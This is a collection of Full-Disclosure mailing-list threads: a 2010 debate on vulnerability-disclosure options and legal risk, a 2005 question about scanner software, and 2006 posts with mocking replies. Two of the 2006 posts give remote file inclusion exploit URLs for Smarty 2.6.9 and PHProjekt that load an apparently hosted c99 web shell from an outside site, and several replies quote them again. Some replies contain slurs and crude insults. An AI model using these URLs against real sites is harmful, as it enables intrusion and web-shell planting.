Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)

[Valdis . Kletnieks]

On Thu, 29 Apr 2010 10:17:22 +0200, Thierry Zoller said:
> >- Releasing at a conference => Probable court time.
> Under what legislation would that potentially be the case ?

Ask Michael Lynn about that sometime. And Sklylarov ended up in jail for
a while for saying 'Rot-13'.


pgpTuzi8BVO1c.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)

[Thierry Zoller]

Hello,

Your missing legislative circumstances in your thoughts :

>- Releasing at a conference => Probable court time.
Under what legislation would that potentially be the case ?

>- Keeping it to yourself => Working under the assumption that your the
>only one that has found that same bug is still semi relevant due to
>the incredibly small size of the exploit dev community. However, as
>Dave said, they'll be toasting to their sleeping dead 0days some day.
Under  the  jurisdiction  I  personaly  am under I am responsbile if I
DON'T  disclose  vulnerabilities  (to  the  vendor)  -  this  includes
potential damages should the vulnerability be used. This is the law
over here if you have the PSF statute.


-- 
http://blog.zoller.lu
Thierry Zoller


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)

[Sergio 'shadown' Alvarez]

Rob,

The reason why different options exist is because people have the  
freedom of choice, and depending on their way of thinking they do.

Some people want to get paid for their findings through ZDI or  
iDefense, others prefer the credits only by publishing advisories  
following or not an RFP. I use to launch advisories in the past, now  
I'm with the 'No More Free Bugs'.

Some people prefer to watch the vulnerabilities get fixed, while  
others prefer to create weaponized exploits to sell to governments  
cyber warfare and cybercrime divisions, or to someone else.

As you won't succeed making politicians agree among them in their way  
of thinking, you'll also fail trying to do the same among us.

Cheers,
sergio


On Apr 29, 2010, at 5:06 AM, Rob Fuller wrote:

> I have an admittedly limited view of the exploit dev world. However,
> from what I've seen devs have very few options: (Please correct me if
> I'm wrong)
>
> "Responsible Disclosure" =>
>
> - Direct Contact => depending on the size of the vendor and their view
> on security, this could result in anything from a simple thanks, a
> reward, to a court hearing.
>
> - Exploit Broker => possibly sell, possibly not, depends on the
> broker. The vuln could die on the table or stolen due to too much
> information being given during negotiations. This route has the same
> financial risk as direct contact, but a lot less risk of getting sued.
>
> - ZDI (or other vuln clearing house) => "instant" cash, but admittedly
> less than an Exploit Broker could possible get based on the financial
> risk to ZDI. Close to zero risk of court time (they may come after you
> for selling the exploit). And a lot less financial risk since (IIRC)
> they pay up front. But then the vulns go to also undisclosed parties,
> potentially the highest bidder which is probably not the vendor.
>
> - "other" secretive groups who share vulns for different reasons...
>
> - Just to friends => No cash, no judicial risk, but you do risk them
> stealing/selling your exploit.
>
> "Full Disclosure"
>
> - Posting it to the web for all to see/user => Possible court time,
> but the definite upside is the vendor is forced to react. A very quick
> way to make enemies.
>
> - Releasing at a conference => Probable court time.
>
> "No Disclosure"
>
> - Keeping it to yourself => Working under the assumption that your the
> only one that has found that same bug is still semi relevant due to
> the incredibly small size of the exploit dev community. However, as
> Dave said, they'll be toasting to their sleeping dead 0days some day.
>
> "No More Free Bugs"
>
> - My stance on this is split, while I think people should get paid for
> their work, I relate this movement to mowing someone's lawn and then
> ringing their doorbell and asking for money. However I'm sure Robert
> Graham's punch in the face metaphor also works.
>
> //
>
> Like, I have stated above, I am far and away a newbie to the vuln
> disclosure world and this debate has been going on since before I
> owned my own computer, but with the brilliant minds working at it, why
> doesn't anyone offer up a solid solution to it?
>
> My solution? Create a standard, something that we all abide by. I know
> as hackers we rebel against such things but in the interest of getting
> better security out there (yes, that's what we are here for right?
> right?) we should should really work together on this. What sounds
> right?
>
> I mean, what is the right way to approach someone who's lawn you've
> mowed for the work you have done? Maybe free for open source projects,
> and a price based on exploitability and market share of the affected
> product?
>
>
> For reference:
>
> Vuln Trading Markets and You by Michal Zalewski (lcamtuf):
> => 
> http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html
>
> Vuln Disclosure is Rude by Robert Graham:
> => http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html
>
> No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino  
> Dai Zovi:
> => http://trailofbits.com/2009/03/22/no-more-free-bugs/
>
> Dailydave Post by Dave Aitel:
> => http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html
>
>
> --
> Rob Fuller | Mubix
> Room362.com | Hak5.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vuln Disclosure summarized (TTBOMA)

[Rob Fuller]

I have an admittedly limited view of the exploit dev world. However,
from what I've seen devs have very few options: (Please correct me if
I'm wrong)

"Responsible Disclosure" =>

- Direct Contact => depending on the size of the vendor and their view
on security, this could result in anything from a simple thanks, a
reward, to a court hearing.

- Exploit Broker => possibly sell, possibly not, depends on the
broker. The vuln could die on the table or stolen due to too much
information being given during negotiations. This route has the same
financial risk as direct contact, but a lot less risk of getting sued.

- ZDI (or other vuln clearing house) => "instant" cash, but admittedly
less than an Exploit Broker could possible get based on the financial
risk to ZDI. Close to zero risk of court time (they may come after you
for selling the exploit). And a lot less financial risk since (IIRC)
they pay up front. But then the vulns go to also undisclosed parties,
potentially the highest bidder which is probably not the vendor.

- "other" secretive groups who share vulns for different reasons...

- Just to friends => No cash, no judicial risk, but you do risk them
stealing/selling your exploit.

"Full Disclosure"

- Posting it to the web for all to see/user => Possible court time,
but the definite upside is the vendor is forced to react. A very quick
way to make enemies.

- Releasing at a conference => Probable court time.

"No Disclosure"

- Keeping it to yourself => Working under the assumption that your the
only one that has found that same bug is still semi relevant due to
the incredibly small size of the exploit dev community. However, as
Dave said, they'll be toasting to their sleeping dead 0days some day.

"No More Free Bugs"

- My stance on this is split, while I think people should get paid for
their work, I relate this movement to mowing someone's lawn and then
ringing their doorbell and asking for money. However I'm sure Robert
Graham's punch in the face metaphor also works.

//

Like, I have stated above, I am far and away a newbie to the vuln
disclosure world and this debate has been going on since before I
owned my own computer, but with the brilliant minds working at it, why
doesn't anyone offer up a solid solution to it?

My solution? Create a standard, something that we all abide by. I know
as hackers we rebel against such things but in the interest of getting
better security out there (yes, that's what we are here for right?
right?) we should should really work together on this. What sounds
right?

I mean, what is the right way to approach someone who's lawn you've
mowed for the work you have done? Maybe free for open source projects,
and a price based on exploitability and market share of the affected
product?


For reference:

Vuln Trading Markets and You by Michal Zalewski (lcamtuf):
=> 
http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html

Vuln Disclosure is Rude by Robert Graham:
=> http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html

No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino Dai Zovi:
=> http://trailofbits.com/2009/03/22/no-more-free-bugs/

Dailydave Post by Dave Aitel:
=> http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html


--
Rob Fuller | Mubix
Room362.com | Hak5.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln

[daylasoul]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat
<[EMAIL PROTECTED]> wrote:
>I didn't know those were mutually exclusive.  Thats like asking
>your
>mom is she is a slut or a whore.  Aren't they one and the same?
>
>On 10/15/06, upb <[EMAIL PROTECTED]> wrote:
>>
>> are you fucking stupid or just retarded?
>>
>>
>> On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote:
>> >
>> > Hi I find a new vuln ...
>> >
>> > the vuln :-
>> >
>> > #
>> >
>> > # Auother :- Sp1deR_NeT
>> >
>> > # E-mail :- [EMAIL PROTECTED]
>> >
>> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
>> >
>> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
>> >
>> > #
>> >
>> > Script :- Smarty-2.6.9
>> >
>> > Exploit :- libs/Smarty.class.php?filename=
>www.soqor.net/tools/c99.txt?
>> >
>> > Example :-
>> >
>>
>www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.ne
>t/tools/c99.txt
>> ?
>> >
>> > Vuln Code :-
>> > /**
>> > * wrapper for include() retaining $this
>> > * @return mixed
>> > */
>> >function _include($filename, $once=false, $params=null)
>> >{
>> >if ($once) {
>> >return include_once($filename);
>> >} else {
>> >return include($filename);
>> >}
>> >}
>> > -
>> >
>> > Thx To :-
>nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>> >
>> > -
>> >
>> > WwW.Sp1deR-N3T.Com ///\\\///\\\
>> >
>> > [EMAIL PROTECTED]
>> >
>> > [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]
>> >
>> >
>>
>_
>> > Windows Live™ Messenger has arrived. Click here to download it
>for free!
>> > http://imagine-msn.com/messenger/launch80/?locale=en-gb
>> >
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>> >
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkU4hOEACgkQ3AEcWsxdEQ7OMAP+OFcUTRO2LF0UVWl1YdKpTaMnrsTG
1ML9rZcc276Q9nzsVV3O4SPTd2KExuToLUp1YU16DxtmV5Nk7wbd4yqcOEa996bWWTq8
Kc/oK04GJgGoLX9BqGvXkuLXEjZFfTaZegbshjUUJjH/kGEYFdutIlHlkqtL2uNUjMW/
P69GcKk=
=F3kH
-END PGP SIGNATURE-




Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[wac]

Thanks. But don´t worry I won´t read sh... anyway :) Nothing interesting could come from that hitman anyway.RegardsWACOn 10/16/06, 
Pink Hat <[EMAIL PROTECTED]> wrote:
On 10/16/06, wac <[EMAIL PROTECTED]> wrote:> Hey you could start by writing those sites in english :P>
http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8Not perfect but readable... I guess...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[C. Hamby]

Nah. That's probably WAY too advanced for 'em.  I get the feeling this
is the AOL sort of person.
Honestly, I'm surprised they figured out how to subscribe to this list
in the first place...


Ferdinand Klinzer wrote:
> Google search : Intro to HTML
> 
> cheers
> 
> Am 16.10.2006 um 12:42 schrieb C. Hamby:
> 
>>> Yipe!
>>>
>>> Ya know if you need an "intro to HTML" book I can probably scare  
>>> one up
>>> for ya... :-)
>>>
>>> Pink Hat wrote:
 On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
> Hey you could start by writing those sites in english :P
>
 http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- 
 HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8

 Not perfect but readable... I guess...

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[Ferdinand Klinzer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Google search : Intro to HTML

cheers

Am 16.10.2006 um 12:42 schrieb C. Hamby:

> Yipe!
>
> Ya know if you need an "intro to HTML" book I can probably scare  
> one up
> for ya... :-)
>
> Pink Hat wrote:
>> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>>> Hey you could start by writing those sites in english :P
>>>
>>
>> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- 
>> HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
>>
>> Not perfect but readable... I guess...
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (Darwin)

iD8DBQFFM3NgivpgT1glX4cRAiiDAKCJSYmVrMNRbd3fnqk2eVUo2FWylgCgoxoQ
BrkTpdSb3gdBQsBdoS6+psU=
=ctNs
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[C. Hamby]

Yipe!

Ya know if you need an "intro to HTML" book I can probably scare one up
for ya... :-)

Pink Hat wrote:
> On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
>> Hey you could start by writing those sites in english :P
>>
> 
> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8
> 
> Not perfect but readable... I guess...
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[Pink Hat]

On 10/16/06, wac <[EMAIL PROTECTED]> wrote:
> Hey you could start by writing those sites in english :P
>

http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8

Not perfect but readable... I guess...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[wac]

Hey you could start by writing those sites in english :POn 10/13/06, hitham hitham <[EMAIL PROTECTED]
> wrote:===# Found By Sp1deR_NeT ..
# E-mail :- [EMAIL PROTECTED]# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
# We Are :- PalEstine  HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )*Script :- PHP rojekt5.1.1-Code Vuln :-$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)In File :- editor_big.php-Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?Example :- 
www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?-
[EMAIL PROTECTED]Sp1deR_NeT  ^__^===_
Be the first to hear what's new at MSN - sign up to our free newsletters!http://www.msn.co.uk/newsletters___Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln

[Chris Kuethe]

On 10/15/06, Pink Hat <[EMAIL PROTECTED]> wrote:
> I didn't know those were mutually exclusive.  Thats like asking your
> mom is she is a slut or a whore.  Aren't they one and the same?

As I said to Pink Hat: "One's freeware, the other is payware."

The more I think about it, the more it's like software licensing:
- some encourage you to share
- some permit you to create derivative works
- some have viral licenses
- some licenses have severable clauses
- there's the whole issue of market penetration
- showing off the patent may cause you to pay for the product

There's more, but I'll leave them for someone else.

CK

-- 
GDB has a 'break' feature; why doesn't it have 'fix' too?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln

[Pink Hat]

I didn't know those were mutually exclusive.  Thats like asking your
mom is she is a slut or a whore.  Aren't they one and the same?

On 10/15/06, upb <[EMAIL PROTECTED]> wrote:
>
> are you fucking stupid or just retarded?
>
>
> On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote:
> >
> > Hi I find a new vuln ...
> >
> > the vuln :-
> >
> > #
> >
> > # Auother :- Sp1deR_NeT
> >
> > # E-mail :- [EMAIL PROTECTED]
> >
> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
> >
> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
> >
> > #
> >
> > Script :- Smarty-2.6.9
> >
> > Exploit :- libs/Smarty.class.php?filename= www.soqor.net/tools/c99.txt?
> >
> > Example :-
> >
> www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt
> ?
> >
> > Vuln Code :-
> > /**
> > * wrapper for include() retaining $this
> > * @return mixed
> > */
> >function _include($filename, $once=false, $params=null)
> >{
> >if ($once) {
> >return include_once($filename);
> >} else {
> >return include($filename);
> >}
> >}
> > -
> >
> > Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
> >
> > -
> >
> > WwW.Sp1deR-N3T.Com ///\\\///\\\
> >
> > [EMAIL PROTECTED]
> >
> > [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]
> >
> >
> _
> > Windows Live™ Messenger has arrived. Click here to download it for free!
> > http://imagine-msn.com/messenger/launch80/?locale=en-gb
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln

[upb]

are you fucking stupid or just retarded?
 
On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote:
Hi I find a new vuln ...the vuln :-#
# Auother :- Sp1deR_NeT# E-mail :- [EMAIL PROTECTED]# Site's :- WWW.Pal-HackinG.Com ++ 
WwW.Sp1deR-N3t.Com# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .#Script :- Smarty-2.6.9Exploit :- libs/Smarty.class.php?filename=
www.soqor.net/tools/c99.txt?Example :-www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt
?Vuln Code :-/*** wrapper for include() retaining $this* @return mixed*/   function _include($filename, $ $params=null)   {   if ($once) {   return include_once($filename);
   } else {   return include($filename);   }   }-Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.-
WwW.Sp1deR-N3T.Com ///\\\///\\\[EMAIL PROTECTED][EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]_
Windows Live™ Messenger has arrived. Click here to download it for free!http://imagine-msn.com/messenger/launch80/?locale=en-gb
___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vuln

[hitham hitham]

Hi I find a new vuln ...

the vuln :-

#

# Auother :- Sp1deR_NeT

# E-mail :- [EMAIL PROTECTED]

# Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com

# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .

#

Script :- Smarty-2.6.9

Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Example :- 
www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?


Vuln Code :-
 /**
* wrapper for include() retaining $this
* @return mixed
*/
   function _include($filename, $once=false, $params=null)
   {
   if ($once) {
   return include_once($filename);
   } else {
   return include($filename);
   }
   }
-

Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.

-

WwW.Sp1deR-N3T.Com ///\\\///\\\

[EMAIL PROTECTED]

[EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]

_
Windows Live™ Messenger has arrived. Click here to download it for free! 
http://imagine-msn.com/messenger/launch80/?locale=en-gb


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln ....

[TheSur]

Ououh! What a geek!, your website is a crapy shit, i laught a lot with yours 
: img src="../../Desktop/333_files/index_05.jpg"

Take care!
- Original Message - 
From: "hitham hitham" <[EMAIL PROTECTED]>
To: 
Sent: Friday, October 13, 2006 4:40 PM
Subject: [Full-disclosure] Vuln  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vuln ....

[hitham hitham]

===

# Found By Sp1deR_NeT ..

# E-mail :- [EMAIL PROTECTED]

# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com

# We Are :- PalEstine  HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )

*

Script :- PHP rojekt5.1.1

-

Code Vuln :-

$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)

In File :- editor_big.php

-

Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/lib/specialdays.php?

$path_pre=www.soqor.net/tools/c99.txt?

-

[EMAIL PROTECTED]

Sp1deR_NeT  ^__^

===

_
Be the first to hear what's new at MSN - sign up to our free newsletters! 
http://www.msn.co.uk/newsletters

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Vuln scanner software choices

[Matthew Parks]

Secure Enterprise mag did a review of 7 different
"vulnerability-management suites" (as they called them) in Dec. 2004.
Take it for what it's worth, but notice that ISS was not included.
Perhaps the review offered by Mr. Schmehl is all you need.

http://www.secureenterprisemag.com/products/showArticle.jhtml?articleID=
54200188

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Paul
Schmehl
Sent: Thursday, November 10, 2005 4:58 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vuln scanner software choices

--On Thursday, November 10, 2005 12:32:27 -0700 Tblinux
<[EMAIL PROTECTED]>
wrote:

> I know that most if not all of you use or have used Nessus at some
point.
> I've been following the thread. Now that it appears that Nessus is 
> seriously ratcheting down support for independent consultants and 
> corporate / gov't users without a registered and paid for license what

> scanning software are you considering? Has anyone done a *complete* 
> comparison of all of the scanning software out there and made a choice

> based on the findings? If so what was it?
>
There's bound to be a comparison somewhere.  All I can tell you, from
personal experience, is avoid ISS like the plague it is.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


This message contains confidential information intended only for the individual 
named.  If you are not the addressee, do not disseminate, distribute or copy 
this e-mail.  Please notify the sender immediately by e-mail if you have 
received this by mistake and delete it from your system.  E-mail cannot 
guarantee secure, error-free transmission as information can be intercepted, 
corrupted, lost, destroyed, arrive late or incomplete, or contain viruses.  The 
sender therefore does not accept liability for any errors or omissions in the 
contents of this message, which arise because of e-mail transmission.  If 
verification is required, please request a hard-copy version.  When working 
with third parties, e-mail cannot be used in lieu of signed paper documents to 
represent approvals of, authority for or acknowledgements of company 
transactions.  Any views or opinions presented in this email are solely those 
of the author and do not necessarily represent those of Pioneer Credit 
Recovery, Inc.  26 Edward St. Arcade, NY 14009 http://www.pioneer-credit.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vuln scanner software choices

[Paul Schmehl]

--On Thursday, November 10, 2005 12:32:27 -0700 Tblinux <[EMAIL PROTECTED]> 
wrote:



I know that most if not all of you use or have used Nessus at some point.
I've been following the thread. Now that it appears that Nessus is
seriously ratcheting down support for independent consultants and
corporate / gov't users without a registered and paid for license what
scanning software are you considering? Has anyone done a *complete*
comparison of all of the scanning software out there and made a choice
based on the findings? If so what was it?

There's bound to be a comparison somewhere.  All I can tell you, from 
personal experience, is avoid ISS like the plague it is.


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vuln scanner software choices

[Tblinux]

I know that most if not all of you use or have used Nessus at some 
point. I've been following the thread. Now that it appears that Nessus 
is seriously ratcheting down support for independent consultants and 
corporate / gov't users without a registered and paid for license what 
scanning software are you considering? Has anyone done a *complete* 
comparison of all of the scanning software out there and made a choice 
based on the findings? If so what was it?


I work for a fairly large company and the contract negotiations with 
Tenable are going poorly and the company I work for is looking at the 
options.


Any input would be greatly appreciated
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/